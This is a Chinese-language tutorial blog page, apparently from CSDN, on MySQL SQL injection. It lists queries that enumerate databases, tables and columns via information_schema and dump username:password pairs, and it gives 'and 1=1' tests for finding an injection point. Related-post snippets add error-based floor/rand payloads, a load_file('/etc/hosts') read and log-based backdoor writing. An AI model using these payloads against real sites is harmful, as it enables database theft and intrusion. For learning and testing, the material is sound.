sql注入-mysql注入

最新推荐文章于 2023-06-28 07:50:40 发布
最新推荐文章于 2023-06-28 07:50:40 发布
阅读量210 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38849692/article/details/119349145
版权
本文详细探讨了SQL注入的概念,介绍了如何通过查询security数据库、获取表和字段信息来进行注入。讲解了SQL注入的不同类型,包括联合查询注入、报错注入、布尔注入和延时注入,是理解SQL注入原理和技术防范的重要参考资料。
摘要由CSDN通过智能技术生成

sql常用的注入语句

查询数据库----假设为 security

select database();

在这里插入图片描述

查询数据库中的表

 select group_concat(table_name) from information_schema.tables where table_schema=database();

在这里插入图片描述

查询表中的字段名(security.users表中的列)

select group_concat(column_name) from information_schema.columns where table_name='users';

在这里插入图片描述

查询字段的值(0x3a是:)

select group_concat(username,0x3a,password) from users;

在这里插入图片描述

学习SQL注入简单类型:

如何判断注入点:
	and 1=1 页面正常
	and 1=2 页面错误
	可能存在注入点
选用经验最足的方法去测试:
	或 且 非 三种逻辑判断符
	判断输入的字符是否对页面造成影响,带入数据库进行了查询。

信息收集:

数据库版本:version()
数据库名字:user()
数据库用户:database()
最低0.47元/天 解锁文章
qq_38849692
关注
SQL注入
weixin_64655821的博客
10-10 1761
SQL注入,联合查询,盲注
sql注入-MySQL
最新发布
2202_75361164的博客
04-07 1259
盲注点确认后,我们一般不会去手动尝试一个字节一个字节的跑出来,而是采用工具比如sqlmap或者一些脚本来辅助我们,毕竟是属于重复无意义的工工作,交给机器就好了语句和之前其他查询都是类似,唯一的区别,就是盲注变成了一位字符一位字符的判断,不像之前那样一次性全部获取数据。
mysql注入0x_Mysql-注入总结
weixin_40003478的博客
02-03 361
Mysql-注入细节总结前言尽量深层次剖析每一个细节,最基础的东西往往会因为太过熟悉而抛弃细节环境搭建mysqlcreate database users;use users;create table person2(username text,password text);insert into person2 values ("admin","123456");insert into pers...
MySQL函数
captain
06-04 218
--1. mid()---从文本字段中提取字符; /* column_name 必需。要提取字符的字段。 start 必需。规定开始位置(起始值是 1)。 length 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。 */ select mid(user,1,2) from mysql.user; select mid(user,2) from mysql.user; --2. limit()---返回前几条或者中间某几行数据。第0条开始取3条 select user ...
C++中的常量和修饰符类型
zhuiyunzhugang的博客
12-21 586
修饰符类型: 无符号 有符号 long short 常量:是指在运行过程中,不变化的值。 0123 //八进制 0x3a //16进制 U23 //无符号整型 234ul //无符号长整型(u和L的大小写与位置都可以互换) 整数常量:可以为十进制、十六进制、八进制。八进制的用0表示,0x表示十六进制。 布尔常量:只有两个值。true or false 字符常量:所有的转译字符都是常量 浮点常量:主要是整数+小数点+小数部分+指数部分 3.14159 // 合法的 314159E
【转载】c语言位域基础知识讲解
tecoes的博客
07-12 478
有些信息在存储时,并不需要占用一个完整的字节, 而只需占几个或一个二进制位。例如在存放一个开关量时,只有0和1 两种状态,用一位二进位即可。为了节省存储空间,并使处理简便,C语言又提供了一种数据结构,称为“位域”或“位段”。所谓“位域”是把一个字节中的二进位划分为几个不同的区域,并说明每个区域的位数。每个域有一个域名,允许在程序中按域名进行操作。 这样就可以把几个不同的对象用一个字节的二进制位域来表示。位域在本质上就是一种结构类型, 不过其成员是按二进位分配的。 在结构体定义时,我们可以指定某个成员.
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-Mysql高权限读写注入
xiaoheizi的博客
06-28 361
1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径。绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过。-1 union select null,'null',null,null 正常。-1 union select null,null,'null',null 正常。执行命令,让日志记录后门代码。
墨者学院之SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 908
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7087
Mysql注入读文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
C语言结构体
yangtuoi的博客
07-12 279
像 int、float、char等是由C语言本身提供的数据类型,不能再进行分拆,我们称之为基本数据类型;而结构体可以包含多个基本类型的数据,也可以包含其他的结构体,我们将它称为复杂数据类型或构造数据类型。 include <stdio.h> int main(){ struct{ char *name; //姓名 int num; //学号 int age; //年龄 char group; //所在小组 .
HEX文件格式分析
蓝晴明的博客
08-10 2186
日常开发工作中hex文件是经常用到的一种文件格式,例如生产部门进行量产程序烧录,那么往往使用的是HEX文件。 下面以stm32生成的hex为例,分析hex的文件格式: 官方定义: <0x3a>[数据长度1Byte][数据地址2Byte][数据类型1Byte][数据nByte][校验1Byte]<0x0d><0x0a> 打开一个stm32生成的hex文件: 1)结合格式分析第一行(指定基地址) :020000040800F2(:02 0000 04 0800 F2) 解析:
C语言基础-----进制转换,原码反码补码
alexhs0的专栏
09-16 4031
知识点: 1.十进制与二进制之间的相互转换 2.二进制与十六进制之间的相互转换 3.正数和负数在内存中的表示方式 4.如何知道一个补码所表示的数       ======================================== 进制和补码 1.二进制 2.十六进制 3.八进制 4.数据在内存中的存储方式   1)正数和负数   2)原码,反码,补码 ==
SQL注入之盲注类型--报错注入函数
weixin_45923850的博客
12-20 575
报错函数 floor() cancat() 将符合条件的所有数据进行拼接,0x7e为‘~’,0x3a为‘:’ 将产生的虚拟表的主键名换为name:select concat(0x7e,database(),0x7e)name或者select concat(0x7e,database(),0x7e) as name 举例:select concat(0x7e,database(),0x7e) rand() rand():生成0-1之间的随机数 rand()*2:生成0-2之间的随机数(2不包含) r
SQL注入——联合查询和报错注入
18年3月萌新白帽子
06-11 6225
1.别人可能用一个括号将要查询的内容阔在一起了  可以使用)将其闭合2.还有人可能过滤掉了关键字可以使用如下方法anandd   selecselectt如果URL中把=号过滤掉了可以使用like进行模糊查询报错注入中sql里 0x3a表示一个冒号具体用法and (select 1 from (select count(*),concat((select count(schema_name) fr...
mysql floor报错_mysql数据库注入floor报错
weixin_42628941的博客
01-27 279
1、通过floor报错可以通过如下一些利用代码and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);and (select count(*) from (select 1 union select null union s...
mysql 注入 爆表_Mysql注入总结(三)
weixin_31523667的博客
01-20 148
昨天整理点东西的时候看到了几年前以前收集的一篇文章,今天也就写两个字。说的是爆表的时候出现[table]前缀,后来改用hex(),然后unhex()出现真正的表名原文:《MYSQL注入解决方括号[table]前缀问题》代码如下:'union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+table_name+...
mysql盲注总结
z7sz的博客
06-21 1159
本文的内容主要是对mysql盲注的总结
数据库注入过滤总结
zhangshanfeng_的博客
06-17 1314
数据库注入总结 文章目录数据库注入总结fuzzMYSQL基本语句万能密码报错注入盲注时间盲注绕过配合sprintfsqlmap文件操作waf绕过结构猜测 fuzz burp的爆破功能,使用wfuzz的sql字典 可以初步得知过滤的情况 MYSQL 基本语句 数据库名 SELECT database(); SELECT group_concat(schema_name) FROM informa...
MySQL SQL注入攻击详解与防范
"这篇资料主要介绍了基于MySQLSQL注入攻击,包括其原理、危害和如何进行防范。SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码来获取或篡改数据库中的敏感信息。" 在Web开发中,SQL注入攻击是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值